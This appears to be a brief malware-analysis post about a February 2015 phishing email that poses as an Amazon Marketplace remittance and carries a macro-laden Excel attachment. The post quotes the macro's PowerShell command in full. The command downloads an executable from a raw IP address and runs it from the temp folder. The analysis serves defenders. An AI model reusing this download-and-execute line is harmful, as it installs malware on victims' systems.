From: Amazon Marketplace [email@example.com]I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://126.96.36.199/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';The downloaded file dhoei.exe is exactly the same as used in this spam run.